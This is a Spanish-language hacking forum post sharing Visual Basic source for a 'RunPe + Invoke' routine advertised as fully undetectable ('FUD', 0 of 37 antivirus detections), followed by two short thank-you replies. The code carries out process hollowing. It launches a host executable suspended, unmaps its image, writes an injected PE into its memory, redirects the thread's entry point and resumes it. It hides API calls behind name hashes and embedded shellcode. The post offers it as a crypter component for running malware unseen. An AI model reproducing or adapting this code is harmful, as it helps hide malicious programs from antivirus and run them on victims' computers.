
RunPe + Invoke ( FUD) By M3


Conectado ANTRAX

« en: Junio 01, 2012, 06:18:13 am »
Código: Visual Basic
  1. ' ===========================================================================================================================
  2. ' ===========================================================================================================================
  3. ' => Autor: M3
  4. ' => RunPe + Invoke FUD baseado en el JunPE de Jhonjhon_123
  5. ' => Credits to Jhonjhon_123 | Karcrack | Cobein | Mike D Sutton
  6. ' => Detecciones : 0 | 37   (http://scanner.udtools.net/reporte.php?id=y4nu_SnKz)
  7. ' => Flecha : 13|05|2012
  8. ' => sHost : Ruta al exe
  9. ' => sBytes: Bytes a ejecutar
  10. ' ===========================================================================================================================
  11. ' ===========================================================================================================================
  12. Declare Function CallThunk8 Lib "user32" Alias "CallWindowProcA" (ByRef cCode As Currency, Optional ByVal lP1 As Long, Optional ByVal lP2 As Long, Optional ByVal lP3 As Long, Optional ByVal lP4 As Long) As Long
  13. Declare Function ExeThunk Lib "user32" Alias "CallWindowProcA" (ByVal Address As Any, Optional ByVal Param1 As Long, Optional ByVal Param2 As Long, Optional ByVal Param3 As Long, Optional ByVal Param4 As Long) As Long
  14. Declare Function sMulDiv Lib "kernel32" Alias "MulDiv" (ByRef a As Any, Optional ByVal b As Long = 1, Optional ByVal c As Long = 1) As Long
  15. Private sVALUE                         As Byte
  16. Private sMEMORY(40)                    As Byte
  17. Private ASM_GETAPIPTR(170)             As Byte
  18. Private ASM_CALLCODE(255)              As Byte
  19. Private IMAGE_DOS_HEADER(65)           As Byte
  20. Private IMAGE_NT_HEADERS(256)          As Byte
  21. Private IMAGE_SECTION_HEADER(60)       As Byte
  22. Private PROCESS_INFORMATION(44)        As Byte
  23. Private tCONTEXT(210)                  As Byte
  24. Private STARTUPINFO(16)                As Long
  25. Private sParams                        As Long
  26. Private sImageBase                     As Long
  27. Private sProcess                       As Long
  28. Private sThread                        As Long
  29. Private SizeOfImage                    As Long
  30. Private SizeOfHeaders                  As Long
  31. Private sEntryPoint                    As Long
  32. Private sVirtualAddress                As Long
  33. Private sRawData                       As Long
  34. Private sRawDataPoint                  As Long
  35. Private sEbx                           As Long
  36. Private D                              As Long
  37. Private Y                              As Long
  38. Private vItem                          As Variant
  39. Private sSection                       As Integer
  40.  
  41.  
  42. Public Function sInject(ByVal sHost As String, ByRef sBytes() As Byte)
  43.  
  44.  
  45. For Each vItem In Array(&H56, &H8B, &HEC, &H57, &H60, &H60, &HFC, &H8B, &H75, &HC, &H8B, &H7D, &H8, &H8B, &H4D, &H10, &HC1, _
  46. &HE9, &H2, &HF3, &HA5, &H8B, &H4D, &H10, &H83, &HE1, &H3, &HF3, &HA4, &H61, &H5F, &H5E, &HC9, &HC2, &H10, &H0, &H10)
  47.  
  48.  
  49. sMEMORY(Y) = vItem
  50.  
  51. Y = Y + 1
  52.  
  53. sVALUE = 200 + 48
  54.  
  55. Next
  56.  
  57.  
  58. Call MoveMemory(sMulDiv(STARTUPINFO(0)), sMulDiv(72), CLng("0"))
  59.  
  60. Call MoveMemory(sMulDiv(tCONTEXT(CLng("0"))), sMulDiv(&H10007), &H1 + &H4 + &H3)
  61.  
  62. Call MoveMemory(sMulDiv(IMAGE_DOS_HEADER(CLng("0"))), sMulDiv(sBytes(CLng("0"))), 72)
  63.  
  64. Call MoveMemory(sMulDiv(sParams), sMulDiv(IMAGE_DOS_HEADER(60)), &H1 + &H3 + &H2)
  65.  
  66. Call MoveMemory(sMulDiv(IMAGE_NT_HEADERS(CLng("0"))), sMulDiv(sBytes(sParams)), 256)
  67.  
  68. Call MoveMemory(sMulDiv(sImageBase), sMulDiv(IMAGE_NT_HEADERS(52)), &H1 + &H3 + &H2)
  69.  
  70. Call MoveMemory(sMulDiv(SizeOfImage), sMulDiv(IMAGE_NT_HEADERS(80)), &H1 + &H4 + &H3)
  71.  
  72. Call MoveMemory(sMulDiv(SizeOfHeaders), sMulDiv(IMAGE_NT_HEADERS(84)), &H1 + &H4 + &H3)
  73.  
  74. Call MoveMemory(sMulDiv(sEntryPoint), sMulDiv(IMAGE_NT_HEADERS(40)), &H1 + &H3 + &H2)
  75.  
  76. Call MoveMemory(sMulDiv(sSection), sMulDiv(IMAGE_NT_HEADERS(6)), &H2)
  77.  
  78. Call Invoke("KERNEL32", "CreateProcessW", 0, StrPtr(sHost), 0, 0, &H1, &H4, 0, 0, sMulDiv(STARTUPINFO(CLng("0"))), sMulDiv(PROCESS_INFORMATION(CLng("0"))))
  79.  
  80. Call MoveMemory(sMulDiv(sProcess), sMulDiv(PROCESS_INFORMATION(CLng("0"))), &H1 + &H3)
  81.  
  82. Call MoveMemory(sMulDiv(sThread), sMulDiv(PROCESS_INFORMATION(4)), &H1 + &H3)
  83.  
  84. Call Invoke("NTDLL", "NtUnmapViewOfSection", sProcess, sImageBase)
  85.  
  86. Call Invoke("KERNEL32", "VirtualAllocEx", sProcess, sImageBase, SizeOfImage, &H3000&, &H40)
  87.  
  88. Call Invoke("NTDLL", "NtWriteVirtualMemory", sProcess, sImageBase, sMulDiv(sBytes(CLng("0"))), SizeOfHeaders, CLng("0"))
  89.  
  90. For D = 0 To sSection - 1
  91.  
  92. Call MoveMemory(sMulDiv(IMAGE_SECTION_HEADER(CLng("0"))), sMulDiv(sBytes(sParams + sVALUE + 40 * D)), &H40)
  93.  
  94. Call MoveMemory(sMulDiv(sVirtualAddress), sMulDiv(IMAGE_SECTION_HEADER(12)), &H1 + &H3 + &H2)
  95.  
  96. Call MoveMemory(sMulDiv(sRawDataPoint), sMulDiv(IMAGE_SECTION_HEADER(16)), &H1 + &H4 + &H3)
  97.  
  98. Call MoveMemory(sMulDiv(sRawData), sMulDiv(IMAGE_SECTION_HEADER(20)), &H1 + &H3)
  99.  
  100. Call Invoke("NTDLL", "NtWriteVirtualMemory", sProcess, sImageBase + sVirtualAddress, sMulDiv(sBytes(sRawData)), sRawDataPoint, CLng("0"))
  101.  
  102. Next
  103.  
  104. Call Invoke("NTDLL", "NtGetContextThread", sThread, sMulDiv(tCONTEXT(CLng("0"))))
  105.  
  106. Call Invoke("NTDLL", "NtWriteVirtualMemory", sProcess, sEbx + &H4 + &H1 + &H3, sMulDiv(sVirtualAddress), &H1 + &H3 + &H2, CLng("0"))
  107.  
  108. Call MoveMemory(sMulDiv(tCONTEXT(176)), sMulDiv(sImageBase + sEntryPoint), &H1 + &H3)
  109.  
  110. Call MoveMemory(sMulDiv(sEntryPoint), sMulDiv(tCONTEXT(176)), &H1 + &H3)
  111.  
  112. Call Invoke("NTDLL", "NtSetContextThread", sThread, sMulDiv(tCONTEXT(CLng("0"))))
  113.  
  114. Call Invoke("NTDLL", "NtResumeThread", sThread, CLng("0"))
  115.  
  116. End Function
  117.  
  118.  
  119. Public Sub MoveMemory(ByVal lpDest As Long, ByVal lpSource As Long, ByVal cBytes As Long)
  120.    
  121.     ExeThunk sMulDiv(sMEMORY(0)), lpDest, lpSource, cBytes, CLng("0")
  122.    
  123. End Sub
  124.  
  125.  
  126.  
  127. Function Invoke(ByVal sDLL As String, hHash As String, ParamArray vParams() As Variant) As Long
  128.  
  129. On Error Resume Next
  130. Dim vItem                       As Variant
  131. Dim sThunk                      As String
  132.  
  133. Call PutThunk(THUNK_GETAPIPTR, ASM_GETAPIPTR)
  134.  
  135. For Each vItem In vParams
  136. sThunk = "68" & GetLng(vItem) & sThunk
  137. Next vItem
  138.  
  139. Call PutThunk(sThunk & "B8" & GetLng(ExeThunk(VarPtr(ASM_GETAPIPTR(CLng("0"))), _
  140. StrPtr(sDLL), gHash(hHash))) & "FFD0C3" & sThunk, ASM_CALLCODE)
  141.  
  142. Invoke = ExeThunk(VarPtr(ASM_CALLCODE(CLng("0"))))
  143.  
  144.  
  145. End Function
  146.  
  147. Private Function gHash(strHash) As Long
  148. On Error Resume Next
  149.  
  150. Dim i           As Long
  151. Dim lResult     As Long
  152.  
  153. For i = 1 To Len(strHash)
  154. lResult = CallThunk8(-439163333029263.6533@, lResult)
  155. lResult = lResult + Asc(Mid(strHash, i, 1))
  156. Next i
  157. gHash = "&H" & String(8 - Len(Hex(lResult)), "0") & Hex(lResult)
  158.  
  159.  
  160. End Function
  161.  
  162. Private Function GetLng(ByVal lLng As Long) As String
  163. On Error Resume Next
  164. Dim lTMP                        As Long
  165. lTMP = (((lLng And &HFF000000) \ &H1000000) And &HFF&) Or ((lLng And &HFF0000) \ &H100&) Or ((lLng And &HFF00&) * &H100&) Or ((lLng And &H7F&) * &H1000000) ' by Mike D Sutton
  166. If (lLng And &H80&) Then lTMP = lTMP Or &H80000000
  167. GetLng = String(8 - Len(Hex(lTMP)), "0") & Hex(lTMP)
  168. End Function
  169.  
  170. Private Sub PutThunk(ByVal sThunk As String, ByRef bvRet() As Byte)
  171. On Error Resume Next
  172. Dim i                           As Long
  173. For i = 0 To Len(sThunk) - 1 Step 2
  174. bvRet((i / 2)) = ("&H" & Mid(sThunk, i + 1, 2))
  175. Next i
  176. End Sub
  177.  
  178. Function THUNK_GETAPIPTR() As String
  179. THUNK_GETAPIPTR = "E82200000068A44E0EEC50E84300000083C408FF742404FFD0FF7424"
  180. THUNK_GETAPIPTR = THUNK_GETAPIPTR & "0850E83000000083C408C3565531C0648B70308B760C8B761C8B6E08"
  181. THUNK_GETAPIPTR = THUNK_GETAPIPTR & "8B7E208B3638471875F3803F6B7407803F4B7402EBE789E85D5EC355"
  182. THUNK_GETAPIPTR = THUNK_GETAPIPTR & "52515356578B6C241C85ED74438B453C8B54057801EA8B4A188B5A20"
  183. THUNK_GETAPIPTR = THUNK_GETAPIPTR & "01EBE330498B348B01EE31FF31C0FCAC84C07407C1CF0D01C7EBF43B"
  184. THUNK_GETAPIPTR = THUNK_GETAPIPTR & "7C242075E18B5A2401EB668B0C4B8B5A1C01EB8B048B01E85F5E5B595A5DC3"
  185. End Function
« Última modificación: Mayo 12, 2014, 03:34:28 pm por Expermicid »


Desconectado Cronos

« Respuesta #1 en: Junio 01, 2012, 07:52:39 am »
¡Increíble aportazo! Gracias por traerlo.
Saludos, Cronos.-

Desconectado decoder79

« Respuesta #2 en: Junio 09, 2012, 01:06:02 pm »
Otro a la saca que me quedo. Gracias por aportarlo.

 
